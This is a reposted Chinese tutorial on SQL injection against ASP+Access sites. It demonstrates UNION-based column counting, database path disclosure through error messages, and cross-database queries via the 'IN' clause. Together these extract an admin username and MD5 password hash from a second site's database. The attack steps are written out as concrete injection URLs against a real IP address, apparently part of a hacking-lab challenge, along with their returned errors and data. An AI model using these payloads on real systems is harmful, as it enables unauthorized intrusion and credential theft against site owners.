首页 / ACCESS / Access的跨库查询
Access的跨库查询
内容导读
互联网集市收集整理的这篇技术教程文章主要介绍了Access的跨库查询,小编现在分享给大家,供广大互联网技能从业者学习和参考。文章包含3565字,纯文字阅读大概需要6分钟。
内容图文
![Access的跨库查询](/upload/InfoBanner/zyjiaocheng/529/1f609cffe95c45fa822a943ce4c1a66b.jpg)
欢迎进入网络安全论坛,与300万技术人员互动交流 >>进入 大家还记得mssql的跨库查询吧,其实在access中也可以实现2个数据之间的交叉查询。下面我就给大家介绍下access的跨库查询。 首先让我们看看在access里是怎样实现对mdb文件进行查询的,我们随便创建个空
欢迎进入网络安全论坛,与300万技术人员互动交流 >>进入
大家还记得mssql的跨库查询吧,其实在access中也可以实现2个数据之间的交叉查询。下面我就给大家介绍下access的跨库查询。首先让我们看看在access里是怎样实现对mdb文件进行查询的,我们随便创建个空数据库,对数据库D:\daos\db\daidalos.mdb里的admin表的内容进行查询,SQL语句为:
SELECT * from admin in "D:\daos\db\daidalos.mdb" |
查询后,成功返回目标数据库里表admin表里的内容:
在实际的asp注射中,要同时进行2个select,如果大家熟悉php+mysql注射的话,应该很容易想到使用union进行联合查询,在access里我们照样可以使用,使用union查询还有一个好处就是不要去对数据进行一个一个字符的去猜,而可以象mysql+php注射一样直接暴出字段里的数据(具体的mix已经写了一篇详细的文章)。从上面可以看出来要实现跨库查询必修要下面2个条件:
- 使用union查询必须知道前一个select里表的字段数
- 必须知道目标数据库的所在位置,绝对路径。
条件1我们可以根据提示错误信息来手工猜解,也可以通过程序自动实现。
条件2 这个是个难点,不过我们可以通过利用“access暴库”来实现,有人会说既然可以知道数据位置,那不直接下载得拉,其实不然,现在的数据库一般防止下载,有的根本不web目录下。
在黑防第四轮实验室的第一关,就是设置的2个asp+access的下载系统,一个是雨点下载系统,一个是盗帅下载系统。 经过测试 盗帅下载系统可以暴出数据库但是不让下载,似乎也没什么地方可以注射,而雨点下载系统就是漏洞百出了,数据库可以暴且可以直接下载,还可以注射。不过雨点的后台很简单,没什么可以利用的地方,我们的目标就放在得到盗帅后台密码上了,下面我就给大家演示下,通过雨点系统的注射点对盗帅系统的跨库查询而得到盗帅的后台密码:
我们得知雨点系统的list.asp可以注射,我们先去要得到union里的数据表字段数,提交:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201%20from%20userinfo |
返回:
Microsoft JET Database Engine 错误 '80040e14' 在联合查询中所选定的两个数据表或查询中的列数不匹配。 /yddown/list.asp,行51 |
字段不对,我写了个perl脚本自动猜,(代码见后)
当我们提交:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%201,2,3%20from%20userinfo |
无错误返回:
哈哈! 我们已经得到字段数了,并且我们可以得到在字段1的我位置,可以显示我们查询的数据。
现在还就差盗帅的数据库位置了,简单我们暴库,提交:
http://219.237.81.46/dsdown%5cregs.asp |
成功返回路径:
Microsoft JET Database Engine 错误 '80004005' 'D:\111\db\kljdsld.asa'不是一个有效的路径。 确定路径名称拼写是否正确,以及是否连接到文件存放的服务器。 /dsdown/db/user.asp,行6 |
(注意:这样得到的的路径不一定是“完整”的,真正的路径为:D:\111\dsdown\db\kljdsld.asa)
下面我们跨库,构造url如下:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20admin,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1 |
上面的语句是,union查询数据D:\111\db\kljdsld.asa里表admin里id=1的字段admin的数据,如果成功将直接暴出后台管理的用户名:
得到用户名为admin 我们接着暴密码:
http://219.237.81.46/yddown/list.asp?id=75%20union%20select%20pws,3,2%20from%20admin%20in%20"D:\111\dsdown\db\kljdsld.asa"%20where%20id=1 |
如图:
得到密码为32位的md5加密的hash:77e6cbb3f9468eadb655ae6826357922,我们跨库查询成功,这里我只是为大家演示下跨库查询,黑防那里就不管咯 : )。
小结
本文主要是给大家介绍了2个非常有用的方法,第1 我们在asp注射时不一顶要一个个字符去猜,那样遇到中文的很麻烦,直接用union替代数据可以直接暴出数据,不关是中文还是特殊字符,都可以一步到位,第2 就是跨库了,使用很灵活,可以让你在渗透时,有意想不到的收获。
内容总结
以上是互联网集市为您收集整理的Access的跨库查询全部内容,希望文章能够帮你解决Access的跨库查询所遇到的程序开发问题。 如果觉得互联网集市技术教程内容还不错,欢迎将互联网集市网站推荐给程序员好友。
内容备注
版权声明:本文内容由互联网用户自发贡献,该文观点与技术仅代表作者本人。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如发现本站有涉嫌侵权/违法违规的内容, 请发送邮件至 gblab@vip.qq.com 举报,一经查实,本站将立刻删除。
内容手机端
扫描二维码推送至手机访问。